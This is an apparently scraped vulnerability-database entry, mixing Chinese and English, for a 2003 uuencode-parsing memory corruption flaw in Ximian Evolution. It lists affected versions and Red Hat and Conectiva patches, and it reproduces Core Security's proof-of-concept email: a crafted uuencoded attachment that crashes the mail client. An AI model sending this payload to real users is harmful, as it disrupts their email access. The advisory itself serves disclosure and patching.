发布时间 :2003-03-24 00:00:00
修订时间 :2016-10-17 22:29:52

[原文]The try_uudecoding function in mail-format.c for Ximian Evolution Mail User Agent 1.2.2 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a malicious uuencoded (UUE) header, possibly triggering a heap-based buffer overflow.

[CNNVD]Ximian Evolution UUEncoding编码解析内存破坏漏洞(CNNVD-200303-075)

        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution在解析'uuencode'编码的内容时存在问题,远程攻击者可以利用这个漏洞使Ximinan Evolution进程内存破坏,导致拒绝服务攻击。
        Evolution mailer接收到'uuencode'编码的内容后会以透明的方式对其进行解码,通过插入特殊构建的UUE头到EMAIL中,在解析过程中会发生内存破坏,而导致客户端崩溃。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:107Ximian Evolution Mail User Agent uuencoded header Denial of Service

- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20030319 CORE-2003-03-04-01: Multiple vulnerabilities in Ximian 's Evolution Mail User Agent
(UNKNOWN)  BUGTRAQ  20030321 GLSA: evolution (200303-18)

- 漏洞信息

Ximian Evolution UUEncoding编码解析内存破坏漏洞
中危 未知
2003-03-24 00:00:00 2005-10-20 00:00:00
        Ximian Evolution是个人和工作组信息管理解决方案,可使用在Linux和Unix操作系统下,集成Email、日历、会议安排、联系人管理等。
        Ximian Evolution在解析'uuencode'编码的内容时存在问题,远程攻击者可以利用这个漏洞使Ximinan Evolution进程内存破坏,导致拒绝服务攻击。
        Evolution mailer接收到'uuencode'编码的内容后会以透明的方式对其进行解码,通过插入特殊构建的UUE头到EMAIL中,在解析过程中会发生内存破坏,而导致客户端崩溃。

- 公告与补丁

        RHSA-2003:108-01:Updated Evolution packages fix multiple vulnerabilities
        Red Hat Upgrade evolution-1.0.8-11.i386.rpm
        Red Hat Linux 8.0
        Red Hat Upgrade evolution-1.0.8-9.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade gal-devel-0.19.2-3.7x.i386.rpm
        Red Hat Linux 7.3
        Red Hat Upgrade libgal19-0.19.2-3.7x.i386.rpm

- 漏洞信息 (22370)

Ximian Evolution 1.x UUEncoding Denial of Service Vulnerability (EDBID:22370)
linux dos
2003-03-17 Verified
0 Core Security
N/A [点击下载]

A vulnerability has been discovered in the Ximian Evolution Mail User Agent (MUA). The problem occurs when the mailer attempts to process a maliciously encoded e-mail message. When attempting to decode the message, the MUA will repeatedly attempt to allocate memory, resulting in system resource exhaustion and will eventually crash.

This vulnerability affects Ximian Evolution version 1.2.2 and earlier.

From Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X <>
Content-Type: multipart/mixed; boundary=3D"=3D-mTDu5zdJIsixETTwCF5Y"
Message-Id: <1046884154.1731.5.camel@vaiolin>
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

Content-Disposition: inline; filename=3Dname
Content-Type: application/octet-stream; name=3Dname
Content-Transfer-Encoding: 7bit

begin 600 phase2
M8F5G:6X@-C P('!H87-E,0I-.$8U1SHV6$ M0R!0*"<Q13XG,"HS,RA&+310
M6RE%42 N,SQ9,3-1)S$T*%LU0R4Y*E0I.#-"*2 R,D19"DTP0B4Y+E4\5# C
M138W-3!(*5,E+RHB/%$R(TA7*R0@7"E%52DN5#Q0,T!)+2I4*$$V,TTW+20M7#%#,2 *32\D.%4P,T1',20@72E%42 O,SQ-,3) 1"LR7%0Q(S$@+$,Q-2PC
M(%0K,S!(+$(Q(2A$(2DQ4TTR*#1 6 I-+4)5*R)$-$@I5#4O+S,\23131%8T
?,U-,4#(B2$(P(B! (D(@*CDV640B0" @"B *96YD"@


- 漏洞信息

Ximian Evolution Mail User Agent try_uudecoding Function UUE Header Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-03-19 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Ximian Evolution UUEncoding Parsing Memory Corruption Vulnerability
Unknown 7117
Yes No
2003-03-17 12:00:00 2009-07-11 09:06:00
Discovered by Diego Kelyacoubian, Javier Kohen, Alberto Solino, and Juan Vera of Core Security Technologies.

- 受影响的程序版本

Ximian Evolution 1.2.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ RedHat Linux 9.0 i386
Ximian Evolution 1.2.1
Ximian Evolution 1.2
Ximian Evolution 1.1.1
Ximian Evolution 1.0.8
+ Mandriva Linux Mandrake 9.0
Ximian Evolution 1.0.7
Ximian Evolution 1.0.6
Ximian Evolution 1.0.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Ximian Evolution 1.0.4
Ximian Evolution 1.0.3
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ RedHat Linux 7.3
Ximian Evolution 1.2.3

- 不受影响的程序版本

Ximian Evolution 1.2.3

- 漏洞讨论

The Evolution mail client supports "uuencoded" content and decodes it automatically when a message is initially parsed. A memory corruption error is present in the parsing component that can result in the client crashing when specially malformed content is decoded. The presence of such a message in an Evolution user's mailbox may result in a prolonged denial of service as the crashing of the GUI may prevent deletion of the message. The user will also not be able to read messages while the message is present in their mailbox. It is not yet determined whether this vulnerability may be exploited by remote attackers to compromise client hosts. Users are advised to upgrade despite this uncertainty.

- 漏洞利用

The following is taken from the advisory published by Core Security Technologies (see reference section):

The following email will reproduce this vulnerability, note that
an empty line is required before and after the UUE header line.

&gt;From Wed Mar 5 14:06:02 2003
Subject: xxx
From: X X. X &lt;;
Content-Type: multipart/mixed; boundary="=-mTDu5zdJIsixETTwCF5Y"
Message-Id: &lt;1046884154.1731.5.camel@vaiolin&gt;
Mime-Version: 1.0
Date: 05 Mar 2003 14:09:14 -0300

Content-Disposition: inline; filename=name
Content-Type: application/octet-stream; name=name
Content-Transfer-Encoding: 7bit

begin 600



- 解决方案

Red Hat has released a security advisory (RHSA-2003:108-01) which contains fixes for this issue. Users are advised to upgrade as soon as possible.

The appropriate fixes have been applied to the Evolution CVS tree.

Ximian has reported that Evolution 1.2.3 will be released however, it does not appear to be available at this time. Users are advised to monitor the Ximian Evolution release page for further information.

Conectiva Linux has released an advisory. Affected users are advised to upgrade to new versions of Evolution. Further information about obtaining and applying fixes are available in the referenced advisory.

Ximian Evolution 1.0.3

Ximian Evolution 1.0.8

Ximian Evolution 1.2.2

- 相关参考